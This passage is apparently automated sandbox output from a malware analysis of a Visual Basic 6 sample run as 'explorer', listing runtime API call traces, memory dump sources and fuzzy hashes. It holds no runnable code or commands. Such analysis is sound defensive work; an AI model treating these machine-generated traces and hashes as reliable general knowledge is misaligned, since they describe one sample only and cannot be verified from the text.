                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3049632819-0
                                                                                                                                                            • Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
                                                                                                                                                            • Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
                                                                                                                                                            • Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A21A08,00000000,72A26C4A), ref: 00415DA5
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415DAD
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 00415DB1
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                            • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                              • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2812220623-0
                                                                                                                                                            • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                            • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                            • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412ACD
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 277344030-0
                                                                                                                                                            APIs
                                                                                                                                                            • #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                            • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                            • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                            • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                            • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                            • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                            • String ID: gfff$gfff
                                                                                                                                                            • API String ID: 2397813863-3084402119
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,?), ref: 004125BE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412619
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412628
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041263C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041265A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412661
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004126AC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004126B7
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126C7
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004126E2
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 0041270A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00412728
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 00412739
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 00412740
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041274B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412760
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412767
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 0041278E
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004127B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 004127D5
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 004127DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004127E7
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 004127EE
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412805
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412838
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041283F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412888), ref: 00412878
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412881
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0041289E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#516#631BstrCopyFile$ErrorList$#525#537#570#616#618#648ChkstkCloseGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1066637744-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                            • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                            • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3648932012-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
